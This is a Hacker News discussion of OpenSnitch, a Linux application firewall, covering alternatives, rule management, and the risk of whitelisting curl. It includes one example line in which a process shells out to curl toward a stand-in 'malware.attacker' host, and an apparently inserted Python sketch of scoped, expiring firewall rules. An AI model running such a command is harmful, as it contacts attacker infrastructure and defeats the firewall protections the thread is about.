[HN Gopher] OpenSnitch is a GNU/Linux interactive application fi...
___________________________________________________________________
OpenSnitch is a GNU/Linux interactive application firewall
Author : dp-hackernews
Score : 231 points
Date : 2024-08-10 14:15 UTC (8 hours ago)
(HTM) web link (github.com)
(TXT) w3m dump (github.com)
| vhguru wrote:
| Would be great to have Arch and OpenSUSE packages too.
| jiripospisil wrote:
| There is an official package for Arch Linux. It doesn't ship
| with the ebpf modules for some reason though (you need to get
| them separately from AUR).
| diggan wrote:
| `opensnitch` is in the extra repository on Arch, and
| `opensnitch-ebpf-module` exists on the AUR.
| amingilani wrote:
| Is there an open source equivalent for MacOS?
| jiripospisil wrote:
| There's Lulu based on Apple's Network Extension framework but
| there are quite a few issues with the framework itself (it will
| briefly initiate a connection even though there's a deny rule
| for that address etc).
|
| https://github.com/objective-see/LuLu
| lelag wrote:
| Yes, there is: Lulu at https://objective-see.org/products/lulu.html.
| eep_social wrote:
| I tried LuLu and it was okay but I did end up trying and
| subsequently buying Little Snitch. The level of UX polish
| wasn't quite there for me with LuLu.
| collinvandyck76 wrote:
| I also feel the same way re: UX polish. I haven't bought
| Little Snitch yet, but was kind of wondering if I even needed
| to. I've already got a pihole on my tailnet that blocks a
| fair amount of things, and then ublock origin on firefox to
| boot. If LS were only like $20 I'd probably just buy it for
| the pleasing graphs, but otherwise I'm not sure what extra
| value it adds. There's probably a use case for it given the
| other things I have, but perhaps I'm not the target audience.
| eep_social wrote:
| I felt similarly, waited a long time on the trial, and
| grabbed it on sale for a good bit off retail after I was
| sure that it met my needs.
| samlinnfer wrote:
| I've tried to use it extensively (as an interactive firewall).
| However, there are just some problems (that are not the fault of
| OpenSnitch) that I'm not even sure are solvable.
|
| For example, suppose I run `curl` on the terminal. I can either
| always decide on a case-by-case basis to allow it through, or I'm
| required to whitelist it permanently. Once I've whitelisted
| generic tools like `curl` or `wget`, then the floodgates are
| really open, since any malware that has compromised my machine
| can just use `curl` or `wget` to get to the internet without
| hitting the firewall.
| haswell wrote:
| I've found that by using subdomain wildcards and/or subnets, I
| build up a stable set of rules pretty quickly and then only
| have to review requests to new endpoints once in a while.
|
| To me, the peace of mind knowing that I'll be prompted to allow
| new access is worth the initial hassle. And once the habit is
| built, it's pretty easy to manage.
|
| _Editing to add_: I also use expiring rules regularly. Maybe
| I trust an installer and want to let it do its thing. So I open
| it up with a rule for the executable expiring in the near
| future (options include: forever, until reboot, for the next
| 30s, for the next 5 mins, etc). This can drastically simplify
| some tasks if there are a large number of endpoints for some
| reason and avoids leaving a hole open permanently.
| xyst wrote:
| IMO - requires a ton of work. Adoption requires updating
| rules quite often.
| haswell wrote:
| Sounds like that varies widely by person/use case. I've
| been using this software for a couple years at this point.
| I don't have to update rules all that often (usually a few
| rules/week), and when I do, it's usually a 10-30 second
| detour. The only time it takes more work is if I don't know
| why something is trying to connect. But that's exactly the
| scenario I'm targeting, i.e. calling attention to the weird
| looking connections.
|
| My use cases are general productivity, development on side
| projects and a variety of software experiments, gaming, and
| some local AI stuff.
|
| I also don't see this as a ton of work. Rules are 99% pre-
| configured for you and all you have to do is choose the
| scope and duration of the rule and whether to reject or
| allow.
|
| I'll admit it's _annoying_ once in a while if there's a
| major update to software that spawns a bunch of new rules,
| but once I get past the feeling of being annoyed, it's
| really an extremely simple and quick process.
|
| Really have to emphasize the habit creation part. After I
| stuck with it for a few weeks, it became second nature and
| I stopped getting annoyed for the most part. I consider
| this a worthwhile habit to build if you're trying lots of
| code/libraries and want to know what's phoning where.
| BadBadJellyBean wrote:
| A few rules per week sounds like a lot. I think I am not
| paranoid enough to micromanage my connections like this.
| haswell wrote:
| In terms of time spent, that amounts to about one minute
| per week for me right now. Sometimes less.
|
| The user experience is streamlined, and adding rules
| involves responding to a dialog that automatically pops
| up when a connection is attempted. UX is key here and
| this would be a very different story if you had to go
| into a separate rule management interface every time.
|
| Regarding paranoia, I don't see it that way. Supply chain
| attacks are alive and well, and if you're running other
| people's code on a regular basis, this is a low cost
| precautionary measure. I totally recognize that not
| everyone has the same risk profile or tolerance.
| chefandy wrote:
| Is the filter configured per user, or is it system-wide? I
| know you can filter per-user with iptables and whatever the
| newer one is, but I haven't dug that deep into OpenSnitch.
| Maybe a single trusted user account without a login that you
| could su into? I wonder if you could also whitelist a VM
| process and spin up single-use VM sandboxes to use when you
| want to do a bunch of work like that.
|
| Definitely a minor hassle to set up compared to just saying yes
| or no to permissions, but it's not complicated, if it works.
| netule wrote:
| I wonder if there's a way to configure it so that when the
| parent cmd is a trusted command (say, a bash/zsh owned by the
| user), it could let the curl command through and otherwise
| block it. But yeah, that seems like a bit of a hassle.
| akdev1l wrote:
| Then any process can do `system("bash -c curl malware.attacker")`
| netule wrote:
| The bash command line wouldn't be the same as the one
| launched by your terminal, though. But yes, I'm sure there
| are myriad exploits around something like that.
| ddtaylor wrote:
| What could work instead is something where you run a
| command like `opensnitch-context dev` and it would talk
| to the running daemon to do proper authentication ("do
| you want to allow this context to be used?") and then
| hopefully some other magic (cgroups?) to know if the
| processes are part of that context even if they are
| sparse/nested child processes.
| phoe-krk wrote:
| You'd need a firewall that is not just TCP/UDP-aware, but
| HTTP(S)-aware, and a way for your firewall to sniff on TLS-
| encrypted traffic.
| diggan wrote:
| Or be ok with filtering HTTP/TLS traffic based on the domain
| only, as that part isn't encrypted (the SNI [Server Name
| Indication]). OpenSnitch should be able to allow/disallow
| based on that, rather than having to decrypt the TLS part.
| djent wrote:
| So don't do that. Problem solved.
| xyst wrote:
| Might be the same, but what if you allow all curl/wget traffic
| for the 'dev' user, but continue to flag any traffic for the
| 'normal' user?
|
| for dev work run 'su -c curl ... dev'
|
| But if a malicious program in normal user space is running, then
| the app firewall flags curl and wget use appropriately.
|
| It would be annoying to input the password every time, so maybe
| set up PAM to use a YubiKey or biometrics? Also make sure this
| user cannot log in and does not have a password.
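The scoping that samlinnfer, haswell and xyst discuss above (curl allowed only for one account and one set of hosts, subnet-wide rules, and rules that expire) modelled as an added Python example. This is not OpenSnitch's code or its rule format; the Rule fields, the event dictionary and every sample path, user id, host and IP are assumptions constructed for the illustration.

```python
from dataclasses import dataclass
from fnmatch import fnmatch
from ipaddress import ip_address, ip_network
from typing import Optional

@dataclass
class Rule:
    name: str
    action: str                      # "allow" or "deny"
    process: Optional[str] = None    # exact executable path, e.g. /usr/bin/curl
    uid: Optional[int] = None        # limit the rule to one account (the separate 'dev' user idea)
    host: Optional[str] = None       # shell-style hostname wildcard, e.g. *.example.org
    subnet: Optional[str] = None     # CIDR network, e.g. 192.168.1.0/24
    expires: Optional[float] = None  # unix time after which the rule is dead; None = forever
    def matches(self, ev: dict, now: float) -> bool:
        if self.expires is not None and now >= self.expires:
            return False  # an expired temporary rule must not keep granting access
        return all((  # every field left as None is a wildcard
            self.process is None or ev["process"] == self.process,
            self.uid is None or ev["uid"] == self.uid,
            self.host is None or fnmatch(ev.get("host") or "", self.host),
            self.subnet is None or ip_address(ev["ip"]) in ip_network(self.subnet),
        ))

def decide(rules, ev, now):
    """First matching live rule wins; with no match the user would be prompted."""
    for r in rules:
        if r.matches(ev, now):
            return r.action, r.name
    return "ask", None

def demo():
    # Constructed rules and connection events (documentation IP ranges); t0 is an arbitrary clock.
    t0 = 1_700_000_000.0
    rules = [
        Rule("dev-curl-github", "allow", process="/usr/bin/curl", uid=1001, host="*.github.com"),
        Rule("lan-any", "allow", subnet="192.168.1.0/24"),
        Rule("installer-5min", "allow", process="/tmp/installer/setup", expires=t0 + 300),
    ]
    events = [
        {"process": "/usr/bin/curl", "uid": 1001, "host": "api.github.com", "ip": "203.0.113.10"},
        {"process": "/usr/bin/curl", "uid": 1000, "host": "api.github.com", "ip": "203.0.113.10"},
        {"process": "/usr/bin/curl", "uid": 1001, "host": "updates.example.net", "ip": "203.0.113.9"},
        {"process": "/usr/bin/wget", "uid": 1000, "host": None, "ip": "192.168.1.20"},
        {"process": "/tmp/installer/setup", "uid": 1000, "host": None, "ip": "203.0.113.9"},
    ]
    actions = [decide(rules, ev, t0)[0] for ev in events]
    actions.append(decide(rules, events[-1], t0 + 600)[0])  # same installer after its window
    return actions  # ["allow", "ask", "ask", "allow", "allow", "ask"]
```

The second and third events show the point of the thread: the same curl binary from the ordinary account, or to a host outside the wildcard, falls through to a prompt instead of riding a blanket curl whitelist.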
| fsflover wrote:
| The solution that worked for me was to switch to Qubes OS,
| where everything runs in VMs with strong hardware-assisted
| isolation.
| irundebian wrote:
| I switched from Qubes OS to Fedora+Flatpak+Opensnitch.
| Couldn't make it run Wayland on my hybrid GPU system
| (Nvidia). QubesOS drained the battery very quickly, and since
| graphics is afaik software rendered, I ran into
| problems watching HD videos (e.g. a lot of dropped frames
| on YouTube).
| fsflover wrote:
| > graphics is afaik software rendered
|
| Yes, this is accurate (for security reasons). However you
| still should not have serious problems with Youtube:
| https://forum.qubes-os.org/t/hd-video-playback-on-qubes-os-o... (see also a few next posts).
|
| How to fix it if you do have problems: https://forum.qubes-os.org/t/improve-video-playback-performa...
|
| Why did you need Wayland on Qubes?
| mixmastamyk wrote:
| This is great for catching sloppy apps that make an excessive
| number of connections. Thunderbird, I'm looking at you.
|
| I like it, but it has a small annoyance in that the temporary
| rules that have expired don't get deleted or marked in the
| interface. So I have to restart the gui once in a while to clear
| them.
| richardlblair wrote:
| Not to be that guy, because I never really have the time
| myself. But I'm sure PRs are welcome.
| mixmastamyk wrote:
| Have thought about it, though haven't used Qt in twenty
| years.
| orkj wrote:
| Does something like this exist for my phone, Android
| specifically? Any good recommendations?
| Joe_Cool wrote:
| Sadly all real firewalls need root. I was using AFWall+ for a
| long time; it has neat controls for every app to allow or deny
| Wifi, Cell or LAN (if you have it). It is an iptables/nftables
| frontend so you can customize the rules to your heart's
| content: https://github.com/ukanth/afwall. Works from Android 2+.
|
| Without root only VPN solutions like Adguard are available.
|
| EDIT: if you want neat stats: Glasswire has an Android version.
| I have only used the beta so I have no idea about its current
| state. Might be worth checking out though.
| ignoramous wrote:
| _ex-AOSP and rethink dns+firewall dev here_
|
| > _Sadly all real firewalls need root_
|
| What do you mean by a "real" firewall? It is very much
| possible to build a userspace firewall in Android using the
| VPN APIs.
|
| On Android, ROMs like GrapheneOS, Lineage, and CalyxOS have
| firewalls built-in.
|
| > _Glasswire has an Android version_
|
| Note though, Glasswire was recently acquired by another
| company: https://archive.is/KW2R3
| yndoendo wrote:
| I thought parts of the Android OS can bypass the VPN, so
| the firewall becomes ineffective against blocking Google,
| OEMs, and others that have root. Wouldn't the VPN API being
| used as a firewall also prevent one from using a VPN client at
| the same time?
| Joe_Cool wrote:
| > Note though, Glasswire was recently acquired by another
| company
|
| Ah that's why the premium stuff is now free. I was
| wondering. Let's hope it's not the first sign of
| enshittification.
|
| > What do you mean by a "real" firewall?
|
| In my experience the "block all non VPN traffic" options in
| Android don't work reliably. iptables does however.
|
| It's a sad state that you cannot even set a static IPv6 on
| Android without root.
| sureglymop wrote:
| The app "Rethink: DNS + Firewall + VPN" has similar features.
| FireInsight wrote:
| TrackerControl is great too. Both are FOSS and can be used in
| the background for using a custom DNS server and blocking
| certain categories of domains.
| arminiusreturns wrote:
| I really like Rethink DNS. I have learned many things from
| watching it (such as I think Signal is compromised by some
| five-eyes "crossing the border" fuckery.)
| SparkyMcUnicorn wrote:
| My non-root solution is to use NextDNS or ControlD with
| "private DNS" (DNS over TLS).
|
| Doesn't stop direct IP connections, but it's good enough.
|
| I also have the CLI installed on OPNsense so DoH is enforced
| for all devices on my LAN as well.
| supriyo-biswas wrote:
| There's netguard[1], although most of the convenience features
| are behind a small payment.
|
| [1] https://netguard.me
| butz wrote:
| "Small payment" is an understatement :)
|
| "You can get all current and future NetGuard pro features
| (including updates) without Google Play services for the
| GitHub or F-Droid version by a one time donation of EUR 0.10
| or more. If you donate 7 euros or more, you can activate the
| pro features on all Android devices you personally own, else
| you can activate the pro features one time only."
| ggeorgovassilis wrote:
| Netguard is fantastic, although it takes a while to get a
| safe setup working. I'm blocking traffic by default and get
| to see all the blocked connection attempts - the extent to
| which apps transmit data to various parties is depressing.
| Netguard should be a standard OS feature.
| mikae1 wrote:
| GrapheneOS can at least block internet traffic for specific
| apps. But can't do it for port ranges or specific domains.
| JoosToopit wrote:
| AFWall+
|
| Switched to it from NetGuard mentioned above.
| vlovich123 wrote:
| How does this compare with something like UFW? Is the main thing
| a UI to view ongoing activity?
| pull_my_finger wrote:
| OpenSnitch prompts you when there's network activity. So if a
| random app makes a telemetry call or something, you get the
| option to white/greylist that connection with granularity, like
| OK to make a connection to that address from this executable
| etc., or always OK to this address, and with duration options
| like once/for 15 seconds, until reboot etc. Once you get over
| the hurdle of whitelisting the apps you use and trust, it's
| actually pretty nice and gives you good insight into what your
| apps/games are doing that you otherwise wouldn't have known about.
| zargon wrote:
| UFW isn't an application firewall, it only blocks/allows port
| numbers (system-wide), as far as I know.
| irundebian wrote:
| That's right.
| irundebian wrote:
| Can recommend it on Fedora over fiddling with firewalld/firewall-
| config.
| stusmall wrote:
| This is what finally got me over to NixOS. In the past when I've
| used application firewalls it's a lot of setup that often breaks
| on updates changing paths, or I have to redo it all whenever I
| move to a new computer. Just tons and tons of churn and wasted
| effort.
|
| By integrating with the package manager that hasn't been an
| issue. Once I got through the initial work of setting up my
| whitelists I just have a little bit of effort each time I add a
| new package to my nix configs. If I don't want to take on the
| effort of adding a whitelist to my nix config, I can just add a
| temporary whitelist that lasts until the next reboot.
|
| It was a steep learning curve and a lot of work, but now it's a
| breeze to maintain.
| ranger_danger wrote:
| I have tried to use it off and on many times, but all the random
| crashes I get really make it very difficult.
___________________________________________________________________
(page generated 2024-08-10 23:00 UTC)